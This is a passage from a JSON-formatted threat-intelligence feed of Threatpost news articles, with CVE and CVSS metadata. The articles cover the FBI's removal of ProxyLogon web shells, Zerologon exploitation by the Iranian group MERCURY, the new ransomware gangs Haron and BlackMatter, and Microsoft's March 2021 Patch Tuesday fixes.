enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors where installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Denmers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T00:41:11", "description": "So much for darkened servers at the headquarters of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) or [REvil](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) ransomware groups. Turns out, we\u2019ve got either their rebranded versions or two new ransomware gangs to contend with.\n\nThe first new group to appear this month was Haron, and the second is named BlackMatter. As [Ars Technica](<https://arstechnica.com/gadgets/2021/07/july-has-already-brought-us-2-new-ransomware-groups-hunting-for-big-game/?comments=1>)\u2018s Dan Goodin points out, there may be more still out there.\n\nThey\u2019re both claiming to be focused on targets with deep pockets that can pay ransoms in the millions of dollars. They\u2019re also virtue-signaling a la DarkSide, with similar language about sparing hospitals, critical infrastructure, nonprofits, etc.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBlackMatter also promised free decryption if its affiliates screw up and kill kittens or freeze files at, say, pipeline companies, as happened when [Colonial Pipeline was attacked by DarkSide](<https://threatpost.com/colonial-pipeline-ransomware-emergency-declaration/165977/>) in May.\n\n## Haron & Its Cut-and-Paste Ransom Note\n\nThe first sample of the Haron malware was submitted to [VirusTotal](<https://www.virustotal.com/gui/file/6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c/detection>) on July 19. Three days later, the South Korean security firm S2W Lab reported on the group in a [post](<https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4>) that laid out similarities between Haron and Avaddon.\n\nAvaddon is yet another prolific ransomware-as-a-service (RaaS) provider that [evaporated](<https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/>) in June rather than face the legal heat that followed Colonial Pipeline and other big ransomware attacks. At the time, Avaddon [released its decryption keys](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) to BleepingComputer \u2013 2,934 in total \u2013 with each key belonging to an individual victim. According to law enforcement, the average extortion fee Avaddon demanded was about $40,000, meaning the ransomware operators and their affiliates quit and walked away from millions.\n\n## Or Did They?\n\nIn its July 22 post, S2W Lab said that when infected with Haron ransomware, \u201cthe extension of the encrypted file is changed to the victim\u2019s name.\u201d Haron is also similar to Avaddon ransomware in that its operators are using a ransom note and operating their own leak site. In its post, S2W provided side-by-side images of ransom notes from the two gangs.\n\nAs you can see below, the two ransom notes read like a cut-and-paste job. S2W Lab noted that the main difference is that Haron suggests a specific ID and Password for victims to log in to the negotiation site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28120546/Haron-Avaddon-ransom-notes.png>)\n\nRansom notes from Avaddon and Haron. Source: S2W Lab.\n\nThere are loads of other similarities between Haron and Avaddon, including:\n\n * Yet more cut-and-paste verbiage on the two negotiation sites.\n * Nearly identical appearances of the negotiation sites, besides the ransomware name of \u201cAvaddon\u201d being swapped for \u201cHaron.\u201d\n * Identical chunks of open-source JavaScript code used for chat that was previously published on a Russian developer forum.\n * The two leak sites share the same structure.\n\nIf Haron is Avaddon reborn, the new bottles for the old wine include a strategy to induce negotiations by setting a time for the next data update. Another difference: no [triple-threat play](<https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat>) to be seen from Haron, at least not yet. In triple-threat attacks, not only is data encrypted locally and exfiltrated before the ransom demand is made, but recalcitrant victims are also subjected to threats of distributed denial-of-service (DDoS) attack until they yield.\n\nAlso, Haron has shrunk the negotiation time to six days, whereas Avaddon allotted 10 days for negotiation. Another difference is in the engines running the two ransomwares: S2W Lab said that Haron is running on the [Thanos](<https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/>) ransomware \u2013 a \u201cRansomware Affiliate Program,\u201d similar to a ransomware-as-a-service (RaaS), that\u2019s been sold since 2019 \u2013 whereas Avaddon was written in C++.\n\nNone of the similarities are solid proof of Avaddon having risen from the ashes like a ransomware phoenix: They could simply point to one or more threat actors from Avaddon working on a reboot, or they could point to nothing at all.\n\n\u201cIt is difficult to conclude that Haron is a re-emergence of Avaddon based on our analysis,\u201d according to S2W\u2019s writeup, which pointed out that \u201cAvaddon developed and used their own C++ based ransomware,\u201d whereas the publicly available Thanos ransomware that Haron is using is baked on C#.\n\nSentinelOne\u2019s Jim Walter told Ars that he\u2019s seen what look like similarities between Avaddon and Haron samples, but he\u2019ll know more soon.\n\nAs of July 22, Haron\u2019s leak site had only disclosed one victim.\n\n## BlackMatter\n\nThe second ransomware newbie calls itself BlackMatter. News about the new network was reported on Tuesday by security firm Recorded Future \u2013 which labeled it a [successor to DarkSide and REvil](<https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/>) \u2013 and by its news arm, [The Record](<https://therecord.media/blackmatter-ransomware-targets-companies-with-revenues-of-100-million-and-more/>). Risk intelligence firm Flashpoint also [spotted the newcomer](<https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/>), noting that BlackMatter registered an account on the Russian-language underground forums XSS and Exploit on July 19 and deposited 4 bitcoins (approximately $150,000 USD as of Wednesday afternoon) into its Expoit escrow account.\n\nBoth of those forums [banned ransomware discussion](<https://threatpost.com/darkside-toshiba-xss-bans-ransomware/166210/>) in May, following DarkSide\u2019s attack on Colonial Pipeline. In the wake of that catastrophic shutdown, which sparked gas hoarding along the East coast and an emergency order from the federal government, REvil instituted pre-moderation for its partner network, saying that it would ban any attempt to attack any government, public, educational or healthcare organizations.\n\nReferring to DarkSide\u2019s experience, REvil\u2019s backers said that the group was \u201cforced to introduce\u201d these \u201csignificant new restrictions,\u201d promising that affiliates that violated the new rules would be kicked out and that it would give out decryption tools for free.\n\nFlashpoint noted that the large deposit on the Exploit forum shows that BlackMatter is serious.\n\nOn July 21, the threat actor said that the network is looking to buy access to affected networks in the U.S., Canada, Australia, and the UK, presumably for ransomware operations. It\u2019s offering up to $100,000 for network access, as well as a cut of the ransom take.\n\n## Putting Up Big Money for Big Fish\n\nBlackMatter is putting up big money because it\u2019s after big fish. The group said that it was looking for deep-pocketed organizations with revenues of more than $100 million: the size of organizations that could be expected to pay big ransoms. The threat actor is also requiring that targets have 500-15,000 hosts in their networks. It\u2019s also up for all industries, except for healthcare and governments.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28133422/BlackMatter-post-on-Exploit-e1627493683950.png>)\n\nBlackMatter ad on the Exploit underground forum. Source: Recorded Future.\n\n## \u2018We Are Ethical Blood Suckers\u2019\n\nThat\u2019s where the virtual signaling comes in. The Record reports that BlackMatter\u2019s leak site is currently empty, which means that BlackMatter only launched this week and hasn\u2019t yet carried out any network penetrations.\n\nWhen it does go after victims, the list won\u2019t include a roster of target types that is currently, supposedly, taboo to target. A section of BlackMatter\u2019s leak site lists the type of targets that are off-limits, including:\n\n * Hospitals\n * Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)\n * Oil and gas industry (pipelines, oil refineries)\n * Defense industry\n * Non-profit companies\n * Government sector\n\nSound familiar? That\u2019s because it\u2019s a dead ringer for a list formerly provided on the leak site of the DarkSide gang before it supposedly went belly-up following the Colonial attack. Promises not to attack these types of organizations aren\u2019t always adhered to by these gangs\u2019 affiliates, but BlackMatter has promised that if victims from those industries are attacked, the operators will decrypt their data for free.\n\n## Buying Legitimacy\n\nMike Fowler, vice president of intelligence services at GroupSense \u2013 a firm that offers threat intelligence and [ransom negotiation](<https://threatpost.com/whats-next-revil-victims/167926/>) \u2013 has been keeping an eye on BlackMatter. He told Threatpost on Wednesday that lately, there\u2019s been an evolution in tactics, techniques and processes (TTP) used by emerging RaaS cartels such as [Hive](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hive-ransomware>), [Grief](<https://securityaffairs.co/wordpress/118446/cyber-crime/prometheus-grief-ransomware.html>) and, most recently, BlackMatter: an evolution reminiscent of the [2020 shift to double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by [Maze](<https://threatpost.com/maze-ransomware-cognizant/154957/>).\n\n\u201cGroupSense has witnessed an expected jockeying for position and brand awareness within the RaaS cartels,\u201d Fowler said in an email. \u201cThis was clearly evidenced by BlackMatter\u2019s account registration on the top two cybercrime forums. Their deposit of 4 Bitcoins into their escrow account on the largest Russian cybercrime forum, Exploit, is clearly an attempt to purchase legitimacy.\u201d\n\n## Careful Victim Targeting\n\nDigital Shadows\u2019 Sean Nikkel told Threatpost on Wednesday that the careful selection of big companies reflects the increasing number of threat actors that are \u201cdoing their due diligence\u201d when it comes to selecting victims.\n\n\u201cWe\u2019ve seen time and again when they have some knowledge around key personalities within an organization, revenue, size, and even customers, so the idea of big game hunting seems to be in line with observed ransomware trends,\u201d Nikkel said via email.\n\nHe called the virtue signaling and promise to do right by the exempted industries an \u201cinteresting twist.\u201d\n\n\u201cWhile REvil had publicly stated that everything was fair game previously, maybe this cooling-off period from previous attention has forced a change of heart, if it is indeed them coming back,\u201d Nikkel added.\n\n\u201cInteresting\u201d is one way to frame it. Another way to look at it is as squeaking from blood-sucking parasites, as a commenter on Ars\u2019 coverage suggested:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28095200/nehinks-tick-comment-e1627480332556.jpg>)\n\nNeither was GroupSense\u2019s Fowler impressed by BlackMatter\u2019s \u201cpinky promise\u201d not to victimize certain business segments. He said it rings particularly hollow \u201cgiven their rise to prominence as REvil\u2019s standing as the #2 RaaS fades into obscurity.\u201d\n\nStill, to put it all into perspective, while BlackMatter is \u201cthe flavor of the day,\u201d Fowler says that other RaaS services, such as Conti, Grief, Hive and LockBit, are \u201cjust as big a threat.\u201d\n\n## Ransomware Phoenixes or New Ratbags? Time Will Tell\n\nDirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost on Wednesday that anybody who didn\u2019t see REvil or DarkSide re-emerging might not have their head screwed on right. There\u2019s a \u201cgood chance\u201d that REvil decided proactively \u201cto take down everything and to re-emerge, just to make tracking and tracing even more difficult,\u201d he added in an email.\n\nMeanwhile, whatever sabre-rattling the Biden administration has been doing at Russia or China about kinetic responses and hack-backs won\u2019t change the situation, Schrader predicted. As it is, the threat actors are refining their approaches to look at targets that have \u201ca higher motivation\u201d to pay ransom, cases in point being [Kaseya](<https://threatpost.com/zero-days-kaseya-unitrends-backup-servers/168180/>) and [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>).\n\n\u201cRansomware groups will continue to look for attack vectors that are likely to have a higher motivation for payment, and that is the next evolution in this business,\u201d Schrader said via email. \u201cWe already see the early effects. Kaseya, SolarWinds, tools that promise access to high-value assets, where an organization\u2019s revenue stream and reputation depends on.\u201d\n\nSchrader thinks that VMware\u2019s recently added capability of [encrypting EXSi servers](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-8D7D09AC-8579-4A33-9449-8E8BA49A3003.html>) is \u201ca harbinger of what will come,\u201d pointing to CISA\u2019s recent alert about the top routinely exploited vulnerabilities, which included a [warning about CVE-2021-21985](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>): the critical remote code execution (RCE) [vulnerability in VMware vCenter Server](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) and VMware Cloud Foundation.\n\n\u201cIn essence, not paying a ransom is the only angle that will \u2013 over time \u2013 eradicate ransomware,\u201d Schrader said. \u201cAnd to be positioned for that, companies will have to minimize and protect their attack surface, harden their systems and infrastructure, manage existing accounts properly and delete old ones, patch vulnerabilities according to risks, and be able to operate in a cyber-resilient manner when under attack.\u201d\n\n## Where\u2019s the MBA Coursework About Ransomware?\n\nGroupSense\u2019s Fowler said that the focus has to be on prevention and mitigation before ransomware is deployed. But what about after? \u201cRansomware attacks are a cyber issue up to the point that the ransomware is executed,\u201d he pointed out. \u201cThen it becomes a business issue, and this presents business considerations and continuity hurdles not part of the curriculum on any MBA course I\u2019m familiar with currently.\u201d\n\n072821 16:28 UPDATE: Added input from Mike Fowler.\n\n[](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11 AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T18:33:02", "type": "threatpost", "title": "New Ransomware Gangs Haron & BlackMatter Are After Fat Cats", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-07-28T18:33:02", "id": "THREATPOST:6BB33156369CC57707F857196BE6B060", "href": "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. \u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\n** **Microsoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including ([CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>)), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. \u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": 